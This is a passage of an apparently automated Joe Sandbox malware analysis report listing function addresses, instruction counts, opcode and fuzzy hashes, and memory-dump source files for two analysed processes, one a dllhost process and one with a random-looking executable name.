Opcode Fuzzy Hash: 9be17de78e2d5795edbe57233e2d5699361fc12fa1c578418771504218fa0734
Instruction Fuzzy Hash: 51F0FF30E1D96F8EEB98BB6898083BA77E4FF66790F00053BD41DE20C0FF2816848214

Function 00007FF848F416D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb28507b292c8f818e0f7c55b9f23207dedb87ef965744f7937aad2058530635
Instruction ID: ac4e20c1aee4f29f91936619c2766eabcbba5fc3770f9c5000adf3024d2d294a
Opcode Fuzzy Hash: cb28507b292c8f818e0f7c55b9f23207dedb87ef965744f7937aad2058530635
Instruction Fuzzy Hash: D781BD31A0CA5A8FDB98EB1898555B977E2FFA8B50F14017AD44ED32C6CF34AC428785

Function 00007FF848F41D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93123faf7a77113f1d384a9226fd5ba3d0daa53675f40b37df843fd2120bff5
Instruction ID: 1486a6535bc5069f995400764687ef68395b187c0d24e6a2bfa3aabea9ab8aaa
Opcode Fuzzy Hash: b93123faf7a77113f1d384a9226fd5ba3d0daa53675f40b37df843fd2120bff5
Instruction Fuzzy Hash: FE51CF31A0CA9A8FDB48EF1888545BA77E2FFA8740F14457ED44AD7282DF35E842C785

Function 00007FF848F43165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77328cf2fadb95a13e5b9e0de47e5a6d7de9f533a21f65c5058743a8d75580ec
Instruction ID: 21e64a1a71b880a08f3d3154369b0cf24809ea01a8aea51baff7f73b1f961250
Opcode Fuzzy Hash: 77328cf2fadb95a13e5b9e0de47e5a6d7de9f533a21f65c5058743a8d75580ec
Instruction Fuzzy Hash: CF513530D0861E8EEB54EB98C459AFDBBF1EF68741F40407AD00AE72D1DB386945CB54

Function 00007FF848F42145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d709d8a4df11d6e2615cd501e0731bd1a6f567ddc53768f98afddc9066cfd4
Instruction ID: 0712bb02145ecf249ce804fbbebc2de40dc601861e0ba9d27a457c447174b5f7
Opcode Fuzzy Hash: 37d709d8a4df11d6e2615cd501e0731bd1a6f567ddc53768f98afddc9066cfd4
Instruction Fuzzy Hash: 90414831E1DA4A4FE346EB7898491B8BBE0EFA6790F0501BBD00DD71D2DF28A9418365

Function 00007FF848F4B33D Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae097bf81fa418baad7b77c5d6b7230ea34a0c0ca315aa1cc1242593d7424d91
Instruction ID: 312639f07138356c130fa2abcbc7a3ca85c181eedc28faa5067d23a6bae36315
Opcode Fuzzy Hash: ae097bf81fa418baad7b77c5d6b7230ea34a0c0ca315aa1cc1242593d7424d91
Instruction Fuzzy Hash: 6041BC71E2C94A9EF741FBA898492F977E0FF69751F0448B7D409E60D3EF28A4418314

Function 00007FF848F4A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08770c6ba71e76260333955517cc6ad815fa93189fa10c67bd35cfb8d6001239
Instruction ID: 1f7dbb75e595117b634a0bf67817a2986c680923337d0a3fa18f92dadd185e50
Opcode Fuzzy Hash: 08770c6ba71e76260333955517cc6ad815fa93189fa10c67bd35cfb8d6001239
Instruction Fuzzy Hash: D1215E7091864DCFDB85EF18C459AAD7BF0FF6D345F0505AAE80AD7291DB34A890CB80

Function 00007FF848F43354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae883888b9af3c845c6c2cc76f4a65f3c003f0f8f15ce91ce903598d9b44d1c8
Instruction ID: 5a37adbfa54cf492360ea8c8542aa667f47725eeb828cf6deffbc306b0898b6e
Opcode Fuzzy Hash: ae883888b9af3c845c6c2cc76f4a65f3c003f0f8f15ce91ce903598d9b44d1c8
Instruction Fuzzy Hash: 7A21C03184D78A8FE742EB7888589A97FF0EF5B300F0904EBD048C70A3DA28954AC751

Function 00007FF848F434E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f65fcf2c328891f15d5ca547f48dc1e432376a3b1cbf7adbb63d2bfea7d0d27
Instruction ID: 35c29c5ee01b8106684c6449756c9d0a1eb65f0f211c57212bdf84e7ca80818e
Opcode Fuzzy Hash: 8f65fcf2c328891f15d5ca547f48dc1e432376a3b1cbf7adbb63d2bfea7d0d27
Instruction Fuzzy Hash: 48113C7090868E8FDB49EB6888596BA7BA0FF28741F0405BAD419D61D1DB35A5408B04

Function 00007FF848F42E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ce0f5b9ecc5b7af8730f164cefa25a21b68bed38a7e13d8741cfe89d8cca2f
Instruction ID: 0d079a3077383da10e8e79e58c634a24750adbb8153e4adbfea343b7242fd7a6
Opcode Fuzzy Hash: 76ce0f5b9ecc5b7af8730f164cefa25a21b68bed38a7e13d8741cfe89d8cca2f
Instruction Fuzzy Hash: 1D01783091D68E8FE751FBA888886A97BE0FF69781F0544B7D40CD70A2EB38E4848704

Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eafdbb9d7291fdcba86556cd25559ec4a76b41b90e9ab880f481d177fbeecc6
Instruction ID: 1b263773aead95f1773e1d1b1c69d7f1a13ad46d3cc37fde0f2337a702cf6140
Opcode Fuzzy Hash: 1eafdbb9d7291fdcba86556cd25559ec4a76b41b90e9ab880f481d177fbeecc6
Instruction Fuzzy Hash: CE015E30908A1E9FEB48EF64C4596BAB7A1FF68345F50447ED40EE21D1DB36A590CB44

Function 00007FF848F4285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d55ee85595effa505d362f5b708644a19881816f55c356a851e98ae21f8350dc
Instruction ID: 60bb984c6805f7f0e2e5389b7aa28f9ddeb702d1af9e72f6d3fcdcfab4931b51
Opcode Fuzzy Hash: d55ee85595effa505d362f5b708644a19881816f55c356a851e98ae21f8350dc
Instruction Fuzzy Hash: 9401783090D64E8FE791BBA884896AD7BE0FF69741F5545B7E408D61A2EF38E0408704

Function 00007FF848F42EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fce5b84b3b9b2d8c86110e5b39045aef6a3a5ac473329e3714d93939dfce39
Instruction ID: fa7b818248ca8326bc2d37ee1f95c27e0ad185cf06aca0dbd0c03c4222a1e5f0
Opcode Fuzzy Hash: f6fce5b84b3b9b2d8c86110e5b39045aef6a3a5ac473329e3714d93939dfce39
Instruction Fuzzy Hash: DF01BC3091D2898FE742BB7488591A97BE0EF2A350F4A04F7C408CB0E6EB38A484C711

Function 00007FF848F41CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf9c35ebff97a340098afaaf2f024a6639ec55477f23fe01f27c63c81f3701c
Instruction ID: 164ebf592440f04d7ec17dd5a519a41eda0b7ebe00083982f7160323648e5476
Opcode Fuzzy Hash: 1bf9c35ebff97a340098afaaf2f024a6639ec55477f23fe01f27c63c81f3701c
Instruction Fuzzy Hash: 9001DC3080D69E8FEB98EF2488592FA7BA0FF65701F4000BAE808D21C2DB36D490C744

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1879695a52c29b51dc5d0ec4207dd1baf0a829025498d2cb3f17bb82bfa81b
Instruction ID: e5423c8c3a54727414ce605a7bb861ab510db4f2d34add054c46345b10cf3683
Opcode Fuzzy Hash: 4b1879695a52c29b51dc5d0ec4207dd1baf0a829025498d2cb3f17bb82bfa81b
Instruction Fuzzy Hash: D2016930819A0E9EEB49FB64C4582BA76A2FF28745F20087EE41ED21D1DF35A590CA04

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e708b0dab89ff3e37c9e3f02b54d8a348631ab1274c2c6e72168807468959765
Instruction ID: 3ebefb3c689bfc048a8ca2001d9895426b82d7298c2502bc38056c5e0dd1583f
Opcode Fuzzy Hash: e708b0dab89ff3e37c9e3f02b54d8a348631ab1274c2c6e72168807468959765
Instruction Fuzzy Hash: BC016D30819A0E9FEB49EB6484582BD76A0FF28745F20087FD40ED21D1DF39A550C614

Function 00007FF848F4AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ab6d6b539bc6df899daee7b7a399467cac679a23ce4cfa162a8699a3cf0dba
Instruction ID: 1d300c775ef36c32c35411d146ba4db59b973d1c2456c0fe29b96e60e15a75e4
Opcode Fuzzy Hash: 80ab6d6b539bc6df899daee7b7a399467cac679a23ce4cfa162a8699a3cf0dba
Instruction Fuzzy Hash: B0F0A97085C90E9FEB41FB3884495BABAE0EF28750F0508B3E40CD60A2EF34A0908604

Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e78ec1b72778073c792efa4846f480923d865b03a5bd3aefb7a2c0c6dd6046
Instruction ID: b38eb653895dd2d73409f27e3ef9504a8d2c069b2a8e15372d87aebed8189229
Opcode Fuzzy Hash: f3e78ec1b72778073c792efa4846f480923d865b03a5bd3aefb7a2c0c6dd6046
Instruction Fuzzy Hash: 1EF0623081D65E8FEB45EF6498152FA77A4FF25349F50047AE80DD21C1DB35A590C748

Function 00007FF848F42779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8746957e7668f2e4c986779aa389899007f6effe31606be1aea4eea9c039b88f
Instruction ID: d960c0b994f96179f5d1332f72d8e02f63b9fe528395ffcd75490ffa93590961
Opcode Fuzzy Hash: 8746957e7668f2e4c986779aa389899007f6effe31606be1aea4eea9c039b88f
Instruction Fuzzy Hash: 64F0A93180E38A8FEB5AAB2488182A93FA1FF26745F5504BBE409C60D2EB38A454C741

Function 00007FF848F40FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb542b308ba926ab319e9789123a88e2a3f487810a00787370825232365a24e
Instruction ID: d52b3d621f308aa160a21401bce8f0d312172777540bee50c3008f6fadca6469
Opcode Fuzzy Hash: adb542b308ba926ab319e9789123a88e2a3f487810a00787370825232365a24e
Instruction Fuzzy Hash: 5F01D630D096198FEB90FB54C844BEDB7B1EF64741F1082AAD809F7292DF3869848B58

Function 00007FF848F427ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50a5811cbdc471e2b8b146f7e9f3871c56d5d2d0dfe0815c184710bc2328291
Instruction ID: 3d82c1f16429dbfe1a4e0331e74964681c792b16359703ef829687e143513785
Opcode Fuzzy Hash: e50a5811cbdc471e2b8b146f7e9f3871c56d5d2d0dfe0815c184710bc2328291
Instruction Fuzzy Hash: 7CF09A3180E78E8FEB5AAB6488192BD7BA0FF25641F5404BBE809C61E2EB399454C741

Non-executed Functions

Function 00007FF848F4387E Relevance: 5.1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

/p]I, xrefs: 00007FF848F43924
8p], xrefs: 00007FF848F438D4
0p]I, xrefs: 00007FF848F43944
.p]I, xrefs: 00007FF848F43954

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: .p]I$/p]I$0p]I$8p]
API String ID: 0-2657320912
Opcode ID: d9efaf1ee082948c9e8b98f70f531ae3d33ae2264ca2d96d64a0cb793e4f1b53
Instruction ID: 8f66ddeeeb239f1be7711ff2daf1728a9df9772f8127e730e20e401f4e4f7cfb
Opcode Fuzzy Hash: d9efaf1ee082948c9e8b98f70f531ae3d33ae2264ca2d96d64a0cb793e4f1b53
Instruction Fuzzy Hash: C031AE6381E7C25FE30397781C28A61BFA4EF63A9071945FBC184DB1E7D509990EC3A2

Analysis Process: mnUYCZffXdEgQlZPiczLektp.exePID: 7304, Parent PID: 4564COMMON

Executed Functions

Function 00007FF848F23565 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc6007ad25b4aced1b899a1fc42264bbd77c77ae1407d6c948a738e092313fd
Instruction ID: 6b47d18274fb6eb9e53be23af6d013b51a9d1e1fbd44ec51d31ee3cdf41750c3
Opcode Fuzzy Hash: dcc6007ad25b4aced1b899a1fc42264bbd77c77ae1407d6c948a738e092313fd
Instruction Fuzzy Hash: 1F91AFB1E1D94E8EE784EB2CD8597E9BFE1FB59354F90027AC009C32D6DF6928058705

Function 00007FF848F20A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F20A70

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 289677cf7bf53ca230f3542e6a8d2c8ce1c7468ba68cbd492712f3a2589b48b2
Instruction ID: cade056d99d032251321d519b0a8d613b31382249ff9286239781209df9d4758
Opcode Fuzzy Hash: 289677cf7bf53ca230f3542e6a8d2c8ce1c7468ba68cbd492712f3a2589b48b2
Instruction Fuzzy Hash: 0F115B32D0854E9FE780FB68D8492B97BE0FF98380F8005B6D808C6196EF39A5448B40

Function 00007FF848F2123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F212AD

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: b2da2a85e8b15fd7898848840e4b150da052436d124efb27021b162e09ae371e
Instruction ID: 2c420ec0c56e25322ab87e51b0b494ce589fc58a6ad25391d7062476f8218810
Opcode Fuzzy Hash: b2da2a85e8b15fd7898848840e4b150da052436d124efb27021b162e09ae371e
Instruction Fuzzy Hash: 2611B230D0D55E8FEB99EBA894592B97BE0FF55341F4405BAE009C60D1EF2A6484C718

Function 00007FF848F21250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F212AD

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: c12170f0719972250bf7077ab2ddf18e5b72fabebc02e34331a99911fe6e6fc5
Instruction ID: e397a67699f6f95770886eefc3abfe11435591b275194c930a6a9452e1eaf36c
Opcode Fuzzy Hash: c12170f0719972250bf7077ab2ddf18e5b72fabebc02e34331a99911fe6e6fc5
Instruction Fuzzy Hash: 94F0AF30D1D55F8EEBA8BBA8A8183BA77E4FF56395F04053AE41DC20D0EF2925948259

Function 00007FF848F2AF65 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c2b73f59a4998bab3c075b14d70fb6bff26ea75cd1f0b5228beda34942c667
Instruction ID: 7bdf44e2f2d958a859bf745ccb00284767d754e160773bc1e8297924b9cd010e
Opcode Fuzzy Hash: 20c2b73f59a4998bab3c075b14d70fb6bff26ea75cd1f0b5228beda34942c667
Instruction Fuzzy Hash: 10026531E0A61ACFDB58EB68D8546FCB7B1FF49345F1001BAD409E7292CB396881CB45

Function 00007FF848F205A0 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deacd11763d7ef5518b2f6b9075bb77bd298d0cbfec3449e42c987b0f8093d99
Instruction ID: 8ffa098b8977296e331e2bfc868677eeead37b855e369570408cb3298ed29530
Opcode Fuzzy Hash: deacd11763d7ef5518b2f6b9075bb77bd298d0cbfec3449e42c987b0f8093d99
Instruction Fuzzy Hash: E891F523E0E5D29FE25577BC78162FA6FA0FF916A4F0C01B7D4888A0D7DE1D540A8399

Function 00007FF848F20638 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6121109876004c9600cf67b8df066c55837cec41eb97b9e0dead0817bd756d90
Instruction ID: f7ce4d0c76288179d402d32f163cac3aaa5a83fd7a4583173fdca7082b49d7b8
Opcode Fuzzy Hash: 6121109876004c9600cf67b8df066c55837cec41eb97b9e0dead0817bd756d90
Instruction Fuzzy Hash: 1581E323E0E5D29FE255B77C78192FA6FA0FF913A4F0801B7D488CA0D7DA2954468399

Function 00007FF848F20615 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecf4dd112bb6aae53f7b047ceb0fa2d25283d6b3ff53707c238f6d06e638530
Instruction ID: 4e1b30441335d259bbb50b474ad839cfa874b86dd71a33b34194dac2a2f7cf7a
Opcode Fuzzy Hash: fecf4dd112bb6aae53f7b047ceb0fa2d25283d6b3ff53707c238f6d06e638530
Instruction Fuzzy Hash: B181E623E0E5D29FE255777C78151FA6FA0FF916A4F0C01B7D4888A0D7EE1D580A8399

Function 00007FF848F205ED Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d69e0b31df0f027a4e7042765d18eb7615ad9e4f4499e15d502daee07142deb
Instruction ID: 13a1f8648ddd734b2f6d34275ab0d9f1bd48005c3cdce3299aedeb820acb6039
Opcode Fuzzy Hash: 9d69e0b31df0f027a4e7042765d18eb7615ad9e4f4499e15d502daee07142deb
Instruction Fuzzy Hash: 0B810523E0E5D29FE355777C78152FA6FA0FF916A4F0C01B7D4888A0D7DA2D540A8399

Function 00007FF848F216D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d77d2e47d3ce8c10646c9e5584e5ba2e4e84aa3aae53606072ce99871b19b68
Instruction ID: 547a3c93317e0672d7627072a82ad47cf467b18fdf31215932fb398958cfe0aa
Opcode Fuzzy Hash: 1d77d2e47d3ce8c10646c9e5584e5ba2e4e84aa3aae53606072ce99871b19b68
Instruction Fuzzy Hash: 5881CD31A0CA4A8FDB58EF58A8615B977E2FF98740F14057AD44EC32C6CF35B8428789

Function 00007FF848F20640 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833aaaa45ac213a40f3968b4b29e88d5953e6984a1a0be0196d3076241d77934
Instruction ID: cc8eea869f00d6991bba4d5dd8b4832cdd41f332daf860461ec252799766a9ee
Opcode Fuzzy Hash: 833aaaa45ac213a40f3968b4b29e88d5953e6984a1a0be0196d3076241d77934
Instruction Fuzzy Hash: F771F623D0E5D29FE255777C781A2FA6FA0FF916A4F0C01B7D4888A0D7DE1D580A8399

Function 00007FF848F2B1E5 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4276015136200232d1edcdd28628140f34e3a8b784ee4ee4eb95e4cda1337e
Instruction ID: 6179ae451aed932234afb11c273f595aa5023cb844d4847fe147023dd5c607b7
Opcode Fuzzy Hash: 2b4276015136200232d1edcdd28628140f34e3a8b784ee4ee4eb95e4cda1337e
Instruction Fuzzy Hash: C3613674E0C61E8FEB94EBA8A4546FDBBB1EF59340F50017AD00DE7281EF3568458B58

Function 00007FF848F21D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85cc8ca2ec7e776aba5c0741d1e9f3bd76a8f24581748a77a4d310447bd458de
Instruction ID: 6e5c0edddf15716fea68e0dfe4d3f0d78b9933186d5c6a192ae1c13c67782584
Opcode Fuzzy Hash: 85cc8ca2ec7e776aba5c0741d1e9f3bd76a8f24581748a77a4d310447bd458de
Instruction Fuzzy Hash: 1851C131A0CA9A8FDB48EF5898545BA77E2FF98340F14467ED44AC7281CF35E842C789

Function 00007FF848F23165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271b402fb75c992475ea4384b700fcaa96237b6f1844913d438464c66418ae97
